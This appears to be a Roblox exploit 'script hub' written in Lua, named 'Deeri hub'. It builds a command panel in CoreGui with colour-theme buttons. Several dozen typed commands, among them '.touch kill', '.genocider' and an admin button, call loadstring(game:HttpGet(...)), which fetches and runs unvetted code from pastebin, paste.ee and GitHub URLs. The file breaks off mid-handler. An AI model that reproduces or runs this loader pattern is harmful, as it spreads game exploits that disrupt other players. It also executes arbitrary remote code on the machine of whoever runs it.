-- Gui to Lua
-- Version: 3.2

-- Instances:

local Linorix = Instance.new("ScreenGui")
local Main = Instance.new("Frame")
local CMD = Instance.new("TextBox")
local Run = Instance.new("TextButton")
local openup = Instance.new("TextButton")
local opendown = Instance.new("TextButton")
local openupitems = Instance.new("Frame")
local adminbutton = Instance.new("TextButton")
local closeup = Instance.new("TextButton")
local colorsettings = Instance.new("TextButton")
local opendownitems = Instance.new("Frame")
local rejoinbutton = Instance.new("TextButton")
local closedown = Instance.new("TextButton")
local clickclear2 = Instance.new("TextButton")
local clickclear = Instance.new("TextButton")
local colorsettings_2 = Instance.new("Frame")
local titleofcolorsettings = Instance.new("TextLabel")
local resetcolorbutton = Instance.new("TextButton")
local darkmodebutton = Instance.new("TextButton")
local punpkinmode = Instance.new("TextButton")
local closeforcolorsettings = Instance.new("TextButton")
local Credit = Instance.new("TextLabel")

--Properties:

Linorix.Name = "Linorix"
Linorix.Parent = game.CoreGui
Linorix.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

Main.Name = "Main"
Main.Parent = Linorix
Main.BackgroundColor3 = Color3.fromRGB(213, 213, 213)
Main.Position = UDim2.new(0.0802139044, 0, 0.611420572, 0)
Main.Size = UDim2.new(0, 373, 0, 135)
Main.Active = true
Main.Draggable = true

CMD.Name = "CMD"
CMD.Parent = Main
CMD.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
CMD.Position = UDim2.new(0, 0, 0.32885924, 0)
CMD.Size = UDim2.new(0, 331, 0, 50)
CMD.ClearTextOnFocus = false
CMD.Font = Enum.Font.SourceSans
CMD.Text = ".Welcome to Deeri hub"
CMD.TextColor3 = Color3.fromRGB(0, 0, 0)
CMD.TextScaled = true
CMD.TextSize = 14.000
CMD.TextWrapped = true

Run.Name = "Run"
Run.Parent = Main
Run.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Run.Position = UDim2.new(0.887399435, 0, 0.325925916, 0)
Run.Size = UDim2.new(0, 42, 0, 50)
Run.Font = Enum.Font.SourceSans
Run.Text = ">"
Run.TextColor3 = Color3.fromRGB(0, 0, 0)
Run.TextScaled = true
Run.TextSize = 14.000
Run.TextWrapped = true

openup.Name = "openup"
openup.Parent = Main
openup.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
openup.Position = UDim2.new(0.356568366, 0, 0, 0)
openup.Size = UDim2.new(0, 102, 0, 29)
openup.Font = Enum.Font.SourceSans
openup.Text = "^"
openup.TextColor3 = Color3.fromRGB(0, 0, 0)
openup.TextScaled = true
openup.TextSize = 14.000
openup.TextWrapped = true

opendown.Name = "opendown"
opendown.Parent = Main
opendown.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
opendown.Position = UDim2.new(0.356568366, 0, 0.785185158, 0)
opendown.Size = UDim2.new(0, 102, 0, 29)
opendown.Font = Enum.Font.SourceSans
opendown.Text = "v"
opendown.TextColor3 = Color3.fromRGB(0, 0, 0)
opendown.TextScaled = true
opendown.TextSize = 14.000
opendown.TextWrapped = true

openupitems.Name = "openupitems"
openupitems.Parent = Main
openupitems.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
openupitems.Position = UDim2.new(0, 0, -0.740740716, 0)
openupitems.Size = UDim2.new(0, 373, 0, 100)
openupitems.Visible = false

adminbutton.Name = "adminbutton"
adminbutton.Parent = openupitems
adminbutton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
adminbutton.Size = UDim2.new(0, 133, 0, 50)
adminbutton.Font = Enum.Font.SourceSans
adminbutton.Text = "Admin"
adminbutton.TextColor3 = Color3.fromRGB(0, 0, 0)
adminbutton.TextScaled = true
adminbutton.TextSize = 14.000
adminbutton.TextWrapped = true
adminbutton.MouseButton1Down:connect(function()
	loadstring(game:HttpGetAsync("https://pastebin.com/raw/qsM4xDCX"))()
end)

closeup.Name = "closeup"
closeup.Parent = openupitems
closeup.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
closeup.Position = UDim2.new(0.356568366, 0, -0.00962966681, 0)
closeup.Size = UDim2.new(0, 102, 0, 29)
closeup.Font = Enum.Font.SourceSans
closeup.Text = "v"
closeup.TextColor3 = Color3.fromRGB(0, 0, 0)
closeup.TextScaled = true
closeup.TextSize = 14.000
closeup.TextWrapped = true

colorsettings.Name = "colorsettings"
colorsettings.Parent = openupitems
colorsettings.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
colorsettings.Position = UDim2.new(0.630026817, 0, 0, 0)
colorsettings.Size = UDim2.new(0, 137, 0, 50)
colorsettings.Font = Enum.Font.SourceSans
colorsettings.Text = "Color settings"
colorsettings.TextColor3 = Color3.fromRGB(0, 0, 0)
colorsettings.TextScaled = true
colorsettings.TextSize = 14.000
colorsettings.TextWrapped = true

opendownitems.Name = "opendownitems"
opendownitems.Parent = Main
opendownitems.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
opendownitems.Position = UDim2.new(0, 0, 1, 0)
opendownitems.Size = UDim2.new(0, 373, 0, 100)
opendownitems.Visible = false

rejoinbutton.Name = "rejoinbutton"
rejoinbutton.Parent = opendownitems
rejoinbutton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
rejoinbutton.Size = UDim2.new(0, 133, 0, 50)
rejoinbutton.Font = Enum.Font.SourceSans
rejoinbutton.Text = "Rejoin"
rejoinbutton.TextColor3 = Color3.fromRGB(0, 0, 0)
rejoinbutton.TextScaled = true
rejoinbutton.TextSize = 14.000
rejoinbutton.TextWrapped = true
rejoinbutton.MouseButton1Down:connect(function()
	loadstring(game:HttpGetAsync("https://pastebin.com/raw/QyWmBd9L"))()
end)

closedown.Name = "closedown"
closedown.Parent = opendownitems
closedown.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
closedown.Position = UDim2.new(0.361930281, 0, 0.709999979, 0)
closedown.Size = UDim2.new(0, 102, 0, 29)
closedown.Font = Enum.Font.SourceSans
closedown.Text = "^"
closedown.TextColor3 = Color3.fromRGB(0, 0, 0)
closedown.TextScaled = true
closedown.TextSize = 14.000
closedown.TextWrapped = true

clickclear2.Name = "clickclear2"
clickclear2.Parent = opendownitems
clickclear2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
clickclear2.Position = UDim2.new(0.630026817, 0, 0, 0)
clickclear2.Size = UDim2.new(0, 138, 0, 50)
clickclear2.Visible = false
clickclear2.Font = Enum.Font.SourceSans
clickclear2.Text = "toggle click clear"
clickclear2.TextColor3 = Color3.fromRGB(0, 0, 0)
clickclear2.TextScaled = true
clickclear2.TextSize = 14.000
clickclear2.TextWrapped = true

clickclear.Name = "clickclear"
clickclear.Parent = opendownitems
clickclear.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
clickclear.Position = UDim2.new(0.630026817, 0, 0, 0)
clickclear.Size = UDim2.new(0, 138, 0, 50)
clickclear.Font = Enum.Font.SourceSans
clickclear.Text = "toggle click clear"
clickclear.TextColor3 = Color3.fromRGB(0, 0, 0)
clickclear.TextScaled = true
clickclear.TextSize = 14.000
clickclear.TextWrapped = true

colorsettings_2.Name = "colorsettings"
colorsettings_2.Parent = Linorix
colorsettings_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
colorsettings_2.Position = UDim2.new(0.554979265, 0, 0.0807799473, 0)
colorsettings_2.Size = UDim2.new(0, 392, 0, 409)
colorsettings_2.Visible = false

titleofcolorsettings.Name = "titleofcolorsettings"
titleofcolorsettings.Parent = colorsettings_2
titleofcolorsettings.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
titleofcolorsettings.Size = UDim2.new(0, 392, 0, 50)
titleofcolorsettings.Font = Enum.Font.SourceSans
titleofcolorsettings.Text = "Color Settings"
titleofcolorsettings.TextColor3 = Color3.fromRGB(0, 0, 0)
titleofcolorsettings.TextScaled = true
titleofcolorsettings.TextSize = 14.000
titleofcolorsettings.TextWrapped = true

resetcolorbutton.Name = "resetcolorbutton"
resetcolorbutton.Parent = colorsettings_2
resetcolorbutton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
resetcolorbutton.Position = UDim2.new(0, 0, 0.154034227, 0)
resetcolorbutton.Size = UDim2.new(0, 140, 0, 50)
resetcolorbutton.Font = Enum.Font.SourceSans
resetcolorbutton.Text = "Reset"
resetcolorbutton.TextColor3 = Color3.fromRGB(0, 0, 0)
resetcolorbutton.TextScaled = true
resetcolorbutton.TextSize = 14.000
resetcolorbutton.TextWrapped = true

darkmodebutton.Name = "darkmodebutton"
darkmodebutton.Parent = colorsettings_2
darkmodebutton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
darkmodebutton.Position = UDim2.new(0, 0, 0.310513437, 0)
darkmodebutton.Size = UDim2.new(0, 140, 0, 50)
darkmodebutton.Font = Enum.Font.SourceSans
darkmodebutton.Text = "Darkmode"
darkmodebutton.TextColor3 = Color3.fromRGB(0, 0, 0)
darkmodebutton.TextScaled = true
darkmodebutton.TextSize = 14.000
darkmodebutton.TextWrapped = true

punpkinmode.Name = "punpkinmode"
punpkinmode.Parent = colorsettings_2
punpkinmode.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
punpkinmode.Position = UDim2.new(0, 0, 0.469437659, 0)
punpkinmode.Size = UDim2.new(0, 140, 0, 50)
punpkinmode.Font = Enum.Font.SourceSans
punpkinmode.Text = "Pumpkin"
punpkinmode.TextColor3 = Color3.fromRGB(0, 0, 0)
punpkinmode.TextScaled = true
punpkinmode.TextSize = 14.000
punpkinmode.TextWrapped = true

closeforcolorsettings.Name = "closeforcolorsettings"
closeforcolorsettings.Parent = colorsettings_2
closeforcolorsettings.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
closeforcolorsettings.Position = UDim2.new(0.854591846, 0, 0, 0)
closeforcolorsettings.Size = UDim2.new(0, 57, 0, 50)
closeforcolorsettings.Font = Enum.Font.SourceSans
closeforcolorsettings.Text = "X"
closeforcolorsettings.TextColor3 = Color3.fromRGB(0, 0, 0)
closeforcolorsettings.TextScaled = true
closeforcolorsettings.TextSize = 14.000
closeforcolorsettings.TextWrapped = true

-- Scripts:

local UserInputService = game:GetService("UserInputService")

UserInputService.InputBegan:Connect(function(keyCode)
	if keyCode.keyCode == Enum.KeyCode.KeypadMinus then
		if Linorix.Enabled == true then
			Linorix.Enabled = false
		else
			Linorix.Enabled = true
		end
	end
end)


local function LOKKHQO_fake_script() -- openup.openupbuttons 
	local script = Instance.new('LocalScript', openup)

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.openupitems.Visible = true
	end)
end
coroutine.wrap(LOKKHQO_fake_script)()
local function KCVLUV_fake_script() -- opendown.opendownbutton 
	local script = Instance.new('LocalScript', opendown)

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.opendownitems.Visible = true
	end)
end
coroutine.wrap(KCVLUV_fake_script)()
local function PABKRFZ_fake_script() -- closeup.closeupitems 
	local script = Instance.new('LocalScript', closeup)

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Visible = false
	end)
end
coroutine.wrap(PABKRFZ_fake_script)()
local function BNQEMDF_fake_script() -- colorsettings.opencolorsettings 
	local script = Instance.new('LocalScript', colorsettings)

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent.Parent.colorsettings.Visible = true
	end)
end
coroutine.wrap(BNQEMDF_fake_script)()
local function RPJO_fake_script() -- closedown.closedownitems 
	local script = Instance.new('LocalScript', closedown)

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Visible = false
	end)
end
coroutine.wrap(RPJO_fake_script)()
local function YQUHWL_fake_script() -- clickclear2.clickclear2scriipt 
	local script = Instance.new('LocalScript', clickclear2)

	script.Parent.MouseButton1Click:Connect(function()
	
		script.Parent.Parent.Parent.CMD.ClearTextOnFocus = false
		
	end)
	
	
	script.Parent.MouseButton1Click:Connect(function()
	
		script.Parent.Parent.clickclear.Visible = true
	end)
	
	
	
	script.Parent.MouseButton1Click:Connect(function()
	
		script.Parent.Parent.clickclear2.Visible = false
		
	end)
end
coroutine.wrap(YQUHWL_fake_script)()
local function VGLGF_fake_script() -- clickclear.clickclear1script 
	local script = Instance.new('LocalScript', clickclear)

	script.Parent.MouseButton1Click:Connect(function()
	
			script.Parent.Parent.Parent.CMD.ClearTextOnFocus = true
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
	
		script.Parent.Parent.clickclear.Visible = false
		
	end)
	
	
	
	script.Parent.MouseButton1Click:Connect(function()
	
		script.Parent.Parent.clickclear2.Visible = true
		
	end)
end
coroutine.wrap(VGLGF_fake_script)()
local function WNIRJOT_fake_script() -- resetcolorbutton.resetcolorscript 
	local script = Instance.new('LocalScript', resetcolorbutton)

	mainui = script.Parent.Parent.Parent.Main
	
	
	
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.BackgroundColor3 =
			Color3.fromHSV(0, 0, 0.835294)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.opendownitems.BackgroundColor3 =
			Color3.fromHSV(0, 0, 1)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.openupitems.BackgroundColor3 =
			Color3.fromHSV(0, 0, 1)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.CMD.BackgroundColor3 =
			Color3.fromHSV(0, 0, 1)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.Run.BackgroundColor3 =
			Color3.fromHSV(0, 0, 1)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.Run.TextColor3 =
			Color3.fromHSV(0, 0, 0)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.CMD.TextColor3 =
			Color3.fromHSV(0, 0, 0)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent.colorsettings.BackgroundColor3 =
			Color3.fromHSV(0, 0, 1)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.opendown.TextColor3 =
			Color3.fromHSV(0, 0, 0)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.openupitems.BackgroundColor3 =
			Color3.fromHSV(0, 0, 1)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.opendownitems.closedown.BackgroundColor3 =
			Color3.fromHSV(0, 0, 1)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.openupitems.closeup.BackgroundColor3 =
			Color3.fromHSV(0, 0, 1)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent.colorsettings.BackgroundColor3 =
			Color3.fromHSV(0, 0, 1)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.opendown.BackgroundColor3 =
			Color3.fromHSV(0, 0, 1)
	end)
	
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.opendownitems.closedown.TextColor3 =
			Color3.fromHSV(0, 0, 0)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.openupitems.closeup.TextColor3 =
			Color3.fromHSV(0, 0, 0)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.openup.BackgroundColor3 =
			Color3.fromHSV(0, 0, 1)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.openup.TextColor3 =
			Color3.fromHSV(0, 0, 0)
	end)
	
end
coroutine.wrap(WNIRJOT_fake_script)()
local function BTQEM_fake_script() -- darkmodebutton.darkmode script 
	local script = Instance.new('LocalScript', darkmodebutton)

	mainui = script.Parent.Parent.Parent.Main
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.BackgroundColor3 =
			Color3.fromHSV(0, 0, 0)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.opendownitems.BackgroundColor3 =
			Color3.fromHSV(0, 0, 0)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.openupitems.BackgroundColor3 =
			Color3.fromHSV(0, 0, 0)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.CMD.BackgroundColor3 =
			Color3.fromHSV(0, 0, 0)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.CMD.TextColor3 =
			Color3.fromHSV(0, 0, 1)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.Run.BackgroundColor3 =
			Color3.fromHSV(0, 0, 0)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.Run.TextColor3 =
			Color3.fromHSV(0, 0, 1)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent.colorsettings.BackgroundColor3 =
			Color3.fromHSV(0, 0, 0)
	end)
	
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.opendown.TextColor3 =
			Color3.fromHSV(0, 0, 1)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.openupitems.BackgroundColor3 =
			Color3.fromHSV(0, 0, 0)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.opendownitems.closedown.BackgroundColor3 =
			Color3.fromHSV(0, 0, 0)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.openupitems.closeup.BackgroundColor3 =
			Color3.fromHSV(0, 0, 0)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent.colorsettings.BackgroundColor3 =
			Color3.fromHSV(0, 0, 0)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.opendown.BackgroundColor3 =
			Color3.fromHSV(0, 0, 0)
	end)
	
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.opendownitems.closedown.TextColor3 =
			Color3.fromHSV(0, 0, 1)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.openupitems.closeup.TextColor3 =
			Color3.fromHSV(0, 0, 1)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.openup.BackgroundColor3 =
			Color3.fromHSV(0, 0, 0)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.openup.TextColor3 =
			Color3.fromHSV(0, 0, 1)
	end)
	
end
coroutine.wrap(BTQEM_fake_script)()
local function YDXBF_fake_script() -- punpkinmode.pumpkinmodescript 
	local script = Instance.new('LocalScript', punpkinmode)

	mainui = script.Parent.Parent.Parent.Main
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.BackgroundColor3 =
			Color3.fromHSV(0.0555556, 1, 1)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.opendownitems.BackgroundColor3 =
			Color3.fromHSV(0.0555556, 1, 1)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.openupitems.BackgroundColor3 =
			Color3.fromHSV(0.0555556, 1, 1)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.CMD.BackgroundColor3 =
			Color3.fromHSV(0.111111, 1, 1)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.CMD.TextColor3 =
			Color3.fromHSV(0, 0, 0)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.Run.BackgroundColor3 =
			Color3.fromHSV(0.111111, 1, 1)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.Run.TextColor3 =
			Color3.fromHSV(0, 0, 0)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent.colorsettings.BackgroundColor3 =
			Color3.fromHSV(0.0555556, 1, 1)
	end)
	
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.opendown.TextColor3 =
			Color3.fromHSV(0, 0, 0)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.openupitems.BackgroundColor3 =
			Color3.fromHSV(0.0555556, 1, 1)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.opendownitems.closedown.BackgroundColor3 =
			Color3.fromHSV(0.111111, 1, 1)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.openupitems.closeup.BackgroundColor3 =
			Color3.fromHSV(0.111111, 1, 1)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent.colorsettings.BackgroundColor3 =
			Color3.fromHSV(0.0555556, 1, 1)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.opendown.BackgroundColor3 =
			Color3.fromHSV(0.111111, 1, 1)
	end)
	
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.opendownitems.closedown.TextColor3 =
			Color3.fromHSV(0, 0, 0)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.openupitems.closeup.TextColor3 =
			Color3.fromHSV(0, 0, 0)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.openup.BackgroundColor3 =
			Color3.fromHSV(0.111111, 1, 1)
	end)
	
	script.Parent.MouseButton1Click:Connect(function()
		mainui.openup.TextColor3 =
			Color3.fromHSV(0, 0, 0)
	end)
	
end
coroutine.wrap(YDXBF_fake_script)()
local function DJCZIRA_fake_script() -- closeforcolorsettings.closecolorsettings 
	local script = Instance.new('LocalScript', closeforcolorsettings)

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Visible = false
	end)
end
coroutine.wrap(DJCZIRA_fake_script)()


Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".sniper" then
		loadstring(game:HttpGet(('https://pastebin.com/raw/dtz7qGBg'),true))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".starglitcher" then
		loadstring(game:HttpGet(('https://pastebin.com/raw/KqcTFiad'),true))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".gale" then
		loadstring(game:HttpGet(('https://pastebin.com/raw/yVXFL5QY'),true))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".cop" then
		loadstring(game:HttpGet(('https://pastebin.com/raw/VAA5Mf60'),true))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".carnage" then
		loadstring(game:HttpGet(('https://pastebin.com/raw/Ntg4PB33'),true))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".NPC" then
		loadstring(game:HttpGet(('https://pastebin.com/raw/8U5qGp6Y'),true))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".elio blasio" then
		loadstring(game:HttpGet(('https://pastebin.com/raw/Uqgjgieq'),true))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".chips" then
		loadstring(game:HttpGet(('https://pastebin.com/raw/Yj0q2v0U'),true))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".segs doll" then
		loadstring(game:HttpGet(('https://pastebin.com/raw/dB6DGBB6'),true))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".titan" then
		loadstring(game:HttpGet(('https://pastebin.com/raw/qSMz7Uiu'),true))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".sonic" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/SyF5t70A"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".neptune v" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/t0Mkc33N"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".gun" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/0Jv3udmi"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".joy" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/0B76TD7N"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".ender" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/hv190Xiq"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".killbot v2" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/G24tcRXA"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".cat v2" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/YLfR8Qx9"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".chill" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/XmHFdTij"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".lutris v2" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/6jeamwQL"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".memeus v2.5" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/cCMJ9C82"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".meme" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/0QfjMKrF"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".krystal dance" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/TELjLdEU"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".pen" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/1qcpeuDm"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".xester" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/RPwyPvEi"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".caducus" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/jfryBKds"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".minigun" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/sK9EUPE6"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".broomstick" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/xyHiNwtg"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".headless" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/mssZBy9j"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".head hold" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/jsZHrVFf"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".goopie" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/fKLm580i"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".spider" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/txsk1LJg4717"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".orange justice" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/Efg0DgkP"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".dumb" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/xLPcieGZ"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".floss" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/JfyvWHLf"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".default dance" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/iXAe7Fub"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".smug" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/NKub3B4R"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".distract dance" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/2tJBN38N"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".russian kick" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/1P37qYeV"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".insanity powers" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/ygWAZh5A"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".zen" then
		loadstring(game:HttpGetAsync("https://raw.githubusercontent.com/o5u3/Zen/main/ZenFlingFE.txt"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".car drift" then
		loadstring(game:HttpGet('https://raw.githubusercontent.com/MonkoTubeYT/carscript/master/!carscript.lua',true))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".hell robotics" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/cF4yBbWs"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".touch kill" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/KaYHHvh7"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".pillow" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/RbKLMpdt"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".rainbow king" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/Xfxx4qJ0"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".pp" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/MMDGHMq1"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".fab" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/A90r2pqX"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".bread" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/rvWcXEBg"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".genocider" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/fFhLBNPU"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".abyss eye" then
		loadstring(game:HttpGet("https://paste.ee/r/tUPmo/0"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".rolex" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/qViPAp8g"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".triangle chat" then
		loadstring(game:HttpGetAsync("https://pastebin.com/raw/ahBKsjJ2"))()
	end
end)

Run.MouseButton1Down:Connect(function()
	if CMD.Text == ".take the l" then
